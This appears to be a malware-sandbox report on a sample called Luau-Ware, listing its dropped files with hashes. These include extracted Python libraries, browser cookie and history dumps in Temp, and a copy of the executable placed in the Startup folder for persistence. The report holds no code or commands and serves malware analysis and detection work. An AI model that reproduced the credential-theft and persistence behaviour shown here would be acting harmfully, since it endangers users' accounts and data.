3e0d07bbf93e0748b42b1c2550f48f0d81597486038c22548224584ae178a543

SHA512
dea92f935bc710df6866e89cc6eb5b53fc7adf0f14f3d381b89d7869590a1b0b1f98f347664f7a19c6078e7aa3eb0f773ffcb711cc4275d0ecd54030d6cf5cb2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\Cipher\_raw_eksblowfish.pyd

Filesize
21KB

MD5
76f88d89643b0e622263af676a65a8b4

SHA1
93a365060e98890e06d5c2d61efbad12f5d02e06

SHA256
605c86145b3018a5e751c6d61fd0f85cf4a9ebf2ad1f3009a4e68cf9f1a63e49

SHA512
979b97aac01633c46c048010fa886ebb09cfdb5520e415f698616987ae850fd342a4210a8dc0fac1e059599f253565862892171403f5e4f83754d02d2ef3f366

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\Cipher\_raw_ocb.pyd

Filesize
17KB

MD5
d48bffa1af800f6969cfb356d3f75aa6

SHA1
2a0d8968d74ebc879a17045efe86c7fb5c54aee6

SHA256
4aa5e9ce7a76b301766d3ecbb06d2e42c2f09d0743605a91bf83069fefe3a4de

SHA512
30d14ad8c68b043cc49eafb460b69e83a15900cb68b4e0cbb379ff5ba260194965ef300eb715308e7211a743ff07fa7f8779e174368dcaa7f704e43068cc4858

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\Cipher\_raw_ofb.pyd

Filesize
12KB

MD5
4d9182783ef19411ebd9f1f864a2ef2f

SHA1
ddc9f878b88e7b51b5f68a3f99a0857e362b0361

SHA256
c9f4c5ffcdd4f8814f8c07ce532a164ab699ae8cde737df02d6ecd7b5dd52dbd

SHA512
8f983984f0594c2cac447e9d75b86d6ec08ed1c789958afa835b0d1239fd4d7ebe16408d080e7fce17c379954609a93fc730b11be6f4a024e7d13d042b27f185

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\Hash\_BLAKE2b.pyd

Filesize
14KB

MD5
f4edb3207e27d5f1acbbb45aafcb6d02

SHA1
8eab478ca441b8ad7130881b16e5fad0b119d3f0

SHA256
3274f49be39a996c5e5d27376f46a1039b6333665bb88af1ca6d37550fa27b29

SHA512
7bdebf9829cb26c010fce1c69e7580191084bcda3e2847581d0238af1caa87e68d44b052424fdc447434d971bb481047f8f2da1b1def6b18684e79e63c6fbdc5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\Hash\_BLAKE2s.pyd

Filesize
14KB

MD5
9d28433ea8ffbfe0c2870feda025f519

SHA1
4cc5cf74114d67934d346bb39ca76f01f7acc3e2

SHA256
fc296145ae46a11c472f99c5be317e77c840c2430fbb955ce3f913408a046284

SHA512
66b4d00100d4143ea72a3f603fb193afa6fd4efb5a74d0d17a206b5ef825e4cc5af175f5fb5c40c022bde676ba7a83087cb95c9f57e701ca4e7f0a2fce76e599

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\Hash\_MD2.pyd

Filesize
14KB

MD5
8a92ee2b0d15ffdcbeb7f275154e9286

SHA1
fa9214c8bbf76a00777dfe177398b5f52c3d972d

SHA256
8326ae6ad197b5586222afa581df5fe0220a86a875a5e116cb3828e785fbf5c2

SHA512
7ba71c37aaf6cb10fc5c595d957eb2846032543626de740b50d7cb954ff910dcf7ceaa56eb161bab9cc1f663bada6ca71973e6570bac7d6da4d4cc9ed7c6c3da

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\Hash\_MD4.pyd

Filesize
13KB

MD5
fe16e1d12cf400448e1be3fcf2d7bb46

SHA1
81d9f7a2c6540f17e11efe3920481919965461ba

SHA256
ade1735800d9e82b787482ccdb0fbfba949e1751c2005dcae43b0c9046fe096f

SHA512
a0463ff822796a6c6ff3acebc4c5f7ba28e7a81e06a3c3e46a0882f536d656d3f8baf6fb748008e27f255fe0f61e85257626010543fc8a45a1e380206e48f07c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\Hash\_MD5.pyd

Filesize
15KB

MD5
34ebb5d4a90b5a39c5e1d87f61ae96cb

SHA1
25ee80cc1e647209f658aeba5841f11f86f23c4e

SHA256
4fc70cb9280e414855da2c7e0573096404031987c24cf60822854eaa3757c593

SHA512
82e27044fd53a7309abaeca06c077a43eb075adf1ef0898609f3d9f42396e0a1fa4ffd5a64d944705bbc1b1ebb8c2055d8a420807693cc5b70e88ab292df81b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\Hash\_RIPEMD160.pyd

Filesize
18KB

MD5
42c2f4f520ba48779bd9d4b33cd586b9

SHA1
9a1d6ffa30dca5ce6d70eac5014739e21a99f6d8

SHA256
2c6867e88c5d3a83d62692d24f29624063fce57f600483bad6a84684ff22f035

SHA512
1f0c18e1829a5bae4a40c92ba7f8422d5fe8dbe582f7193acec4556b4e0593c898956065f398acb34014542fcb3365dc6d4da9ce15cb7c292c8a2f55fb48bb2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\Hash\_SHA1.pyd

Filesize
19KB

MD5
ab0bcb36419ea87d827e770a080364f6

SHA1
6d398f48338fb017aacd00ae188606eb9e99e830

SHA256
a927548abea335e6bcb4a9ee0a949749c9e4aa8f8aad481cf63e3ac99b25a725

SHA512
3580fb949acee709836c36688457908c43860e68a36d3410f3fa9e17c6a66c1cdd7c081102468e4e92e5f42a0a802470e8f4d376daa4ed7126818538e0bd0bc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\Hash\_SHA224.pyd

Filesize
21KB

MD5
c8fe3ff9c116db211361fbb3ea092d33

SHA1
180253462dd59c5132fbccc8428dea1980720d26

SHA256
25771e53cfecb5462c0d4f05f7cae6a513a6843db2d798d6937e39ba4b260765

SHA512
16826bf93c8fa33e0b5a2b088fb8852a2460e0a02d699922a39d8eb2a086e981b5aca2b085f7a7da21906017c81f4d196b425978a10f44402c5db44b2bf4d00a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\Hash\_SHA256.pyd

Filesize
21KB

MD5
a442ea85e6f9627501d947be3c48a9dd

SHA1
d2dec6e1be3b221e8d4910546ad84fe7c88a524d

SHA256
3dbcb4d0070be355e0406e6b6c3e4ce58647f06e8650e1ab056e1d538b52b3d3

SHA512
850a00c7069ffdba1efe1324405da747d7bd3ba5d4e724d08a2450b5a5f15a69a0d3eaf67cef943f624d52a4e2159a9f7bdaeafdc6c689eacea9987414250f3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\Hash\_SHA384.pyd

Filesize
26KB

MD5
59ba0e05be85f48688316ee4936421ea

SHA1
1198893f5916e42143c0b0f85872338e4be2da06

SHA256
c181f30332f87feecbf930538e5bdbca09089a2833e8a088c3b9f3304b864968

SHA512
d772042d35248d25db70324476021fb4303ef8a0f61c66e7ded490735a1cc367c2a05d7a4b11a2a68d7c34427971f96ff7658d880e946c31c17008b769e3b12f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\Hash\_SHA512.pyd

Filesize
26KB

MD5
8194d160fb215498a59f850dc5c9964c

SHA1
d255e8ccbce663ee5cfd3e1c35548d93bfbbfcc0

SHA256
55defcd528207d4006d54b656fd4798977bd1aae6103d4d082a11e0eb6900b08

SHA512
969eeaa754519a58c352c24841852cf0e66c8a1adba9a50f6f659dc48c3000627503ddfb7522da2da48c301e439892de9188bf94eeaf1ae211742e48204c5e42

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\Hash\_ghash_clmul.pyd

Filesize
12KB

MD5
c89becc2becd40934fe78fcc0d74d941

SHA1
d04680df546e2d8a86f60f022544db181f409c50

SHA256
e5b6e58d6da8db36b0673539f0c65c80b071a925d2246c42c54e9fcdd8ca08e3

SHA512
715b3f69933841baadc1c30d616db34e6959fd9257d65e31c39cd08c53afa5653b0e87b41dcc3c5e73e57387a1e7e72c0a668578bd42d5561f4105055f02993c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\Hash\_ghash_portable.pyd

Filesize
13KB

MD5
c4cc05d3132fdfb05089f42364fc74d2

SHA1
da7a1ae5d93839577bbd25952a1672c831bc4f29

SHA256
8f3d92de840abb5a46015a8ff618ff411c73009cbaa448ac268a5c619cf84721

SHA512
c597c70b7af8e77beeebf10c32b34c37f25c741991581d67cf22e0778f262e463c0f64aa37f92fbc4415fe675673f3f92544e109e5032e488f185f1cfbc839fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\Hash\_keccak.pyd

Filesize
16KB

MD5
1e201df4b4c8a8cd9da1514c6c21d1c4

SHA1
3dc8a9c20313af189a3ffa51a2eaa1599586e1b2

SHA256
a428372185b72c90be61ac45224133c4af6ae6682c590b9a3968a757c0abd6b4

SHA512
19232771d4ee3011938ba2a52fa8c32e00402055038b5edf3ddb4c8691fa7ae751a1dc16766d777a41981b7c27b14e9c1ad6ebda7ffe1b390205d0110546ee29

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\Hash\_poly1305.pyd

Filesize
15KB

MD5
76c84b62982843367c5f5d41b550825f

SHA1
b6de9b9bd0e2c84398ea89365e9f6d744836e03a

SHA256
ebcd946f1c432f93f396498a05bf07cc77ee8a74ce9c1a283bf9e23ca8618a4c

SHA512
03f8bb1d0d63bf26d8a6fff62e94b85ffb4ea1857eb216a4deb71c806cde107ba0f9cc7017e3779489c5cef5f0838edb1d70f710bcdeb629364fc288794e6afe

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\Math\_modexp.pyd

Filesize
35KB

MD5
b41160cf884b9e846b890e0645730834

SHA1
a0f35613839a0f8f4a87506cd59200ccc3c09237

SHA256
48f296ccace3878de1148074510bd8d554a120cafef2d52c847e05ef7664ffc6

SHA512
f4d57351a627dd379d56c80da035195292264f49dc94e597aa6638df5f4cf69601f72cc64fc3c29c5cbe95d72326395c5c6f4938b7895c69a8d839654cfc8f26

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\Protocol\_scrypt.pyd

Filesize
12KB

MD5
ba46602b59fcf8b01abb135f1534d618

SHA1
eff5608e05639a17b08dca5f9317e138bef347b5

SHA256
b1bab0e04ac60d1e7917621b03a8c72d1ed1f0251334e9fa12a8a1ac1f516529

SHA512
a5e2771623da697d8ea2e3212fbdde4e19b4a12982a689d42b351b244efba7efa158e2ed1a2b5bc426a6f143e7db810ba5542017ab09b5912b3ecc091f705c6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\PublicKey\_ec_ws.pyd

Filesize
737KB

MD5
3f20627fded2cf90e366b48edf031178

SHA1
00ced7cd274efb217975457906625b1b1da9ebdf

SHA256
e36242855879d71ac57fbd42bb4ae29c6d80b056f57b18cee0b6b1c0e8d2cf57

SHA512
05de7c74592b925bb6d37528fc59452c152e0dcfc1d390ea1c48c057403a419e5be40330b2c5d5657fea91e05f6b96470dddf9d84ff05b9fd4192f73d460093c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\PublicKey\_ed25519.pyd

Filesize
27KB

MD5
290d936c1e0544b6ec98f031c8c2e9a3

SHA1
caeea607f2d9352dd605b6a5b13a0c0cb1ea26ec

SHA256
8b00c859e36cbce3ec19f18fa35e3a29b79de54da6030aaad220ad766edcdf0a

SHA512
f08b67b633d3a3f57f1183950390a35bf73b384855eaab3ae895101fbc07bcc4990886f8de657635ad528d6c861bc2793999857472a5307ffaa963aa6685d7e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\PublicKey\_ed448.pyd

Filesize
65KB

MD5
5782081b2a6f0a3c6b200869b89c7f7d

SHA1
0d4e113fb52fe1923fe05cdf2ab9a4a9abefc42e

SHA256
e72e06c721dd617140edebadd866a91cf97f7215cbb732ecbeea42c208931f49

SHA512
f7fd695e093ede26fcfd0ee45adb49d841538eb9daae5b0812f29f0c942fb13762e352c2255f5db8911f10fa1b6749755b51aae1c43d8df06f1d10de5e603706

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\PublicKey\_x25519.pyd

Filesize
10KB

MD5
289ebf8b1a4f3a12614cfa1399250d3a

SHA1
66c05f77d814424b9509dd828111d93bc9fa9811

SHA256
79ac6f73c71ca8fda442a42a116a34c62802f0f7e17729182899327971cfeb23

SHA512
4b95a210c9a4539332e2fb894d7de4e1b34894876ccd06eec5b0fc6f6e47de75c0e298cf2f3b5832c9e028861a53b8c8e8a172a3be3ec29a2c9e346642412138

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\Util\_cpuid_c.pyd

Filesize
10KB

MD5
4d9c33ae53b38a9494b6fbfa3491149e

SHA1
1a069e277b7e90a3ab0dcdee1fe244632c9c3be4

SHA256
0828cad4d742d97888d3dfce59e82369317847651bba0f166023cb8aca790b2b

SHA512
bdfbf29198a0c7ed69204bf9e9b6174ebb9e3bee297dd1eb8eb9ea6d7caf1cc5e076f7b44893e58ccf3d0958f5e3bdee12bd090714beb5889836ee6f12f0f49e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\Crypto\Util\_strxor.pyd

Filesize
10KB

MD5
8f4313755f65509357e281744941bd36

SHA1
2aaf3f89e56ec6731b2a5fa40a2fe69b751eafc0

SHA256
70d90ddf87a9608699be6bbedf89ad469632fd0adc20a69da07618596d443639

SHA512
fed2b1007e31d73f18605fb164fee5b46034155ab5bb7fe9b255241cfa75ff0e39749200eb47a9ab1380d9f36f51afba45490979ab7d112f4d673a0c67899ef4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\certifi\cacert.pem

Filesize
285KB

MD5
d3e74c9d33719c8ab162baa4ae743b27

SHA1
ee32f2ccd4bc56ca68441a02bf33e32dc6205c2b

SHA256
7a347ca8fef6e29f82b6e4785355a6635c17fa755e0940f65f15aa8fc7bd7f92

SHA512
e0fb35d6901a6debbf48a0655e2aa1040700eb5166e732ae2617e89ef5e6869e8ddd5c7875fa83f31d447d4abc3db14bffd29600c9af725d9b03f03363469b4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\cryptography-42.0.7.dist-info\INSTALLER

Filesize
4B

MD5
365c9bfeb7d89244f2ce01c1de44cb85

SHA1
d7a03141d5d6b1e88b6b59ef08b6681df212c599

SHA256
ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508

SHA512
d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\cryptography-42.0.7.dist-info\LICENSE

Filesize
197B

MD5
8c3617db4fb6fae01f1d253ab91511e4

SHA1
e442040c26cd76d1b946822caf29011a51f75d6d

SHA256
3e0c7c091a948b82533ba98fd7cbb40432d6f1a9acbf85f5922d2f99a93ae6bb

SHA512
77a1919e380730bcce5b55d76fbffba2f95874254fad955bd2fe1de7fc0e4e25b5fdaab0feffd6f230fa5dc895f593cf8bfedf8fdc113efbd8e22fadab0b8998

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\cryptography-42.0.7.dist-info\LICENSE.APACHE

Filesize
11KB

MD5
4e168cce331e5c827d4c2b68a6200e1b

SHA1
de33ead2bee64352544ce0aa9e410c0c44fdf7d9

SHA256
aac73b3148f6d1d7111dbca32099f68d26c644c6813ae1e4f05f6579aa2663fe

SHA512
f451048e81a49fbfa11b49de16ff46c52a8e3042d1bcc3a50aaf7712b097bed9ae9aed9149c21476c2a1e12f1583d4810a6d36569e993fe1ad3879942e5b0d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\cryptography-42.0.7.dist-info\LICENSE.BSD

Filesize
1KB

MD5
5ae30ba4123bc4f2fa49aa0b0dce887b

SHA1
ea5b412c09f3b29ba1d81a61b878c5c16ffe69d8

SHA256
602c4c7482de6479dd2e9793cda275e5e63d773dacd1eca689232ab7008fb4fb

SHA512
ddbb20c80adbc8f4118c10d3e116a5cd6536f72077c5916d87258e155be561b89eb45c6341a1e856ec308b49a4cb4dba1408eabd6a781fbe18d6c71c32b72c41

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\cryptography-42.0.7.dist-info\METADATA

Filesize
5KB

MD5
51e28e442ad9f3ca86fc022806f6b860

SHA1
ec18e5a627febf6fc10fd28f77f03abe0d45f1d3

SHA256
c783b299bf4110de7f94a7da362927657dd1cd0631b00f2d7a2f1242ff4c3a1a

SHA512
a2d54956de9f2a896b270a6f2f738f1c83f13ebfa013ca21c7c8de2c02109065eb8feee1e1c4b5593a3a91eeba5caccf24d174fe7e098a61ed73949330a94e62

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\cryptography-42.0.7.dist-info\RECORD

Filesize
14KB

MD5
4262e116c4363cabd7ca1acbe4494489

SHA1
b2bef714db952e4585b612df6c3728ebb8ae2b26

SHA256
99f3723f903383d17a64b168911c7fc690210f1e5a2933ef5b0fb0d11e21e68b

SHA512
3d560dc346e383ea755caf66588561075c6b97f0542558e02b409ed2c4fba561507b4812614642d74cc3bb261fa405deb2946e81e447ff57b5024ae866a6840e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\cryptography-42.0.7.dist-info\WHEEL

Filesize
100B

MD5
c48772ff6f9f408d7160fe9537e150e0

SHA1
79d4978b413f7051c3721164812885381de2fdf5

SHA256
67325f22d7654f051b7a1d92bd644f6ebaa00df5bf7638a48219f07d19aa1484

SHA512
a817107d9f70177ea9ca6a370a2a0cb795346c9025388808402797f33144c1baf7e3de6406ff9e3d8a3486bdfaa630b90b63935925a36302ab19e4c78179674f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\cryptography-42.0.7.dist-info\top_level.txt

Filesize
13B

MD5
e7274bd06ff93210298e7117d11ea631

SHA1
7132c9ec1fd99924d658cc672f3afe98afefab8a

SHA256
28d693f929f62b8bb135a11b7ba9987439f7a960cc969e32f8cb567c1ef79c97

SHA512
aa6021c4e60a6382630bebc1e16944f9b312359d645fc61219e9a3f19d876fd600e07dca6932dcd7a1e15bfdeac7dbdceb9fffcd5ca0e5377b82268ed19de225

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\cryptography\hazmat\bindings\_rust.pyd

Filesize
6.9MB

MD5
b364cecdba4b73c71116781b1c38d40f

SHA1
59ef6f46bd3f2ec17e78df8ee426d4648836255a

SHA256
10d009a3c97bf908961a19b4aaddc298d32959acc64bedf9d2a7f24c0261605b

SHA512
999c2da8e046c9f4103385c7d7dbb3bfdac883b6292dca9d67b36830b593f55ac14d6091eb15a41416c0bd65ac3d4a4a2b84f50d13906d36ed5574b275773ce7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\pywin32_system32\pywintypes312.dll

Filesize
131KB

MD5
26d752c8896b324ffd12827a5e4b2808

SHA1
447979fa03f78cb7210a4e4ba365085ab2f42c22

SHA256
bd33548dbdbb178873be92901b282bad9c6817e3eac154ca50a666d5753fd7ec

SHA512
99c87ab9920e79a03169b29a2f838d568ca4d4056b54a67bc51caf5c0ff5a4897ed02533ba504f884c6f983ebc400743e6ad52ac451821385b1e25c3b1ebcee0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI52442\win32\win32api.pyd

Filesize
130KB

MD5
3a80fea23a007b42cef8e375fc73ad40

SHA1
04319f7552ea968e2421c3936c3a9ee6f9cf30b2

SHA256
b70d69d25204381f19378e1bb35cc2b8c8430aa80a983f8d0e8e837050bb06ef

SHA512
a63bed03f05396b967858902e922b2fbfb4cf517712f91cfaa096ff0539cf300d6b9c659ffee6bf11c28e79e23115fd6b9c0b1aa95db1cbd4843487f060ccf40

Download Submit
C:\Users\Admin\AppData\Local\Temp\crcookies.txt

Filesize
121B

MD5
a83c32adf051c2a90ce64dccabd0423c

SHA1
3ccc662770fbcda2669fee25bea2106e750c3f7f

SHA256
345b2841d6f911273cc65002584570e987915d394631ef7fe418cbe1c2543cde

SHA512
72b062940ccf652288578b3a6a70b527097c8538dd86b05908baba94a1d6d4c6d95680b971c83474006617ceac26f8c2671891616f39ee1dc3ba5ac8447b7e49

Download Submit
C:\Users\Admin\AppData\Local\Temp\crhistory.txt

Filesize
64B

MD5
955cadd34d0d1e8a3987d383503a4aa0

SHA1
eb30cd7ffdf71eff7ca164c27a2094e470dcd7cd

SHA256
b7ec633e69e8f89a017d82332109998620531e38765897ebb60b35d7d92f59fe

SHA512
255897f14a9fb0550cab86af5571ef8887fdbbb6b5d196fe891b7d61ea1cce8dfd2d4092bfb4f20fc34331c82854fd13bca7aadc77eb502f356f93e629341af4

Download Submit
C:\Users\Admin\AppData\Local\Tempcreirotxzp.db

Filesize
56KB

MD5
5be7f6f434724dfcc01e8b2b0e753bbe

SHA1
ef1078290de6b5700ff6e804a79beba16c99ba3e

SHA256
4064b300ca1a67a3086e1adb18001c0017384b8f84ff4c0e693858889cef2196

SHA512
3b470c3ad5be3dd7721548021a818034584bbd88237b1710ce52ac67e04126fff4592c02f5868ebda72f662ec8c5f7fc4d0a458f49fe5eb47e024a5c50935ee2

Download Submit
C:\Users\Admin\AppData\Local\Tempcrfgpwnvop.db

Filesize
100KB

MD5
baa675ce4124ca3fc5033e2a2c53dbd1

SHA1
2dcc5513270c723fff6148dd2f8196081f83bb16

SHA256
22cc36f18e7df98e3c58cd6fce492688970d4a5d1fb1865e5749b76138cdd9f4

SHA512
047d4d9a7d415d5a4814acc42f9148c0de7ec34c5d53cc90cdcbb218406b343a3c5a1f5ec4cc3b8ccca6b7f08ed0115b7e568a5141e1335c2a2a6ed2682b45ec

Download Submit
C:\Users\Admin\AppData\Local\Tempcrhgvdyhgh.db

Filesize
20KB

MD5
9cc8e44da40321fc1abffe74725258c4

SHA1
9910284e680e76ea332dc19a9c1d3f5a7caf54ef

SHA256
57e0bd6bf60ba3647683b92d8eeb19579332af1dce2d3d65a8ce763c02471012

SHA512
3926c7501e6bc69712ec33b27dd47cf4545bb0d71d915e7cc6546c1c827fbddf5b169b55b94a1d28ada4c2e202edf7930067fe918f3c7a49d5603661cdf14594

Download Submit
C:\Users\Admin\AppData\Local\Tempcrifdzlovp.db

Filesize
46KB

MD5
8f5942354d3809f865f9767eddf51314

SHA1
20be11c0d42fc0cef53931ea9152b55082d1a11e

SHA256
776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea

SHA512
fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

Download Submit
C:\Users\Admin\AppData\Local\Tempcrlfmlmluc.db

Filesize
152KB

MD5
5bb5f288bef1033bb2acfd777dd56efd

SHA1
14667db3eaf0a7511e2e62aa5ca4b193d0fb8451

SHA256
f9dd0d236ab02e8a54149a41734bab5d11581272160b18086bdef04689c36b29

SHA512
1215b58e12d5bca71a023985ae776745e92f543fcba5b82ff23923668b450f09f69b47db3803ff8b4a9c5461278d5910a8a5af424028ba04751b81d2ddebffb8

Download Submit
C:\Users\Admin\AppData\Local\Tempcrxqxqneib.db

Filesize
228KB

MD5
0573092ec2c37efca0d6dc84b62a72ae

SHA1
57d810967103e105affa6cac5fba6084c63b82c9

SHA256
2716611dab41d8fefe5c02fd820ceb16b7450df5ceade9dc7612ad13d0ca11b8

SHA512
f8062f1fb0da4dad29727da27d43a2b00bcd35cf3a453abbd8684cd9d4d76284eb1392bcd39aa19641bda03ed396f4c9400ff7697cca7d011b7abc3874220677

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Luau-Ware.exe

Filesize
5.6MB

MD5
f37a9c887ccc22b1aba5d4eea365bd8d

SHA1
754701a4bb286dbd7cb33748f7fcd8eb801b04d9

SHA256
8fb74d220ca64208eff14bcdedfa3d0bb052a01a5bc1d28967b1d8d499a20acc

SHA512
5bbb21944b4c7224df2923ef7b2c1a070e4f7e1f633aa6c9b441cfe0697d3295daafa836fac1183aa02527c3c1726ac9dd75d5281232d01547c0e73caba6051f

Download Submit
C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6.rar.crdownload

Filesize
16.5MB

MD5
3d748e9cbcb33dca91ca39f9fae6ad8a

SHA1
c4d7419904e6c1f268e215bad0bac0c0fbf864b8

SHA256
93f99516d75ea50b7152bb59600b73a77b5c7690dd6706c1bae8dfda4d91e9ad

SHA512
f2a60ff3490a8569bbfc1008083076e9d9269d7ce0d9b7c9bec045025aa542fea8a4c14d13585105669dd9b7fa6eb231de226ac0669ee97c8d5677d3aca8fe01

Download Submit
C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe

Filesize
16.3MB

MD5
ef5b1b38d27e46fcfbfd45ba8aacfa48

SHA1
37ef296f0935d38a933ab97ae5a647f34892215b

SHA256
b1f852df955504a8646a846e7a6bf51a1ccc61c9fe62c418c42fe1c37abb23b6

SHA512
f77cd9a29ad38c0a70c5f8f340622b3879083d1fe81b460712be68f3d64826daaf711f226740e962faf5f54be8b9ffe592787b0572e9bb2ff441d401e47d407b

Download Submit
C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\auth\README.txt

Filesize
550B

MD5
4a8ca84043acde3773765c94cb4f5297

SHA1
2df09fce2d5724516456b77b59707627c0876167

SHA256
1dc7aa149cdb6ecf2913eefdeb0d74c3bd7512d81e71b8fee7f9f083cda81ed9

SHA512
6b096bd50090f5d290b9469aa4770aa75f7374e397aede96cb4653bd0c7af6a5d1ce29c6da65b0ba52ef770f5d85b74e43829822a0fa56bea7590337e2a24c47

Download Submit
memory/5972-992-0x000001B89BE20000-0x000001B89BE21000-memory.dmp

Filesize
4KB

Download
memory/5972-993-0x000001B89BE20000-0x000001B89BE21000-memory.dmp

Filesize
4KB

Download
memory/5972-991-0x000001B89BE20000-0x000001B89BE21000-memory.dmp

Filesize
4KB

Download
memory/5972-1003-0x000001B89BE20000-0x000001B89BE21000-memory.dmp

Filesize
4KB

Download
memory/5972-1002-0x000001B89BE20000-0x000001B89BE21000-memory.dmp

Filesize
4KB

Download
memory/5972-1001-0x000001B89BE20000-0x000001B89BE21000-memory.dmp

Filesize
4KB

Download
memory/5972-1000-0x000001B89BE20000-0x000001B89BE21000-memory.dmp

Filesize
4KB

Download
memory/5972-999-0x000001B89BE20000-0x000001B89BE21000-memory.dmp

Filesize
4KB

Download
memory/5972-998-0x000001B89BE20000-0x000001B89BE21000-memory.dmp

Filesize
4KB

Download
memory/5972-997-0x000001B89BE20000-0x000001B89BE21000-memory.dmp

Filesize
4KB

Download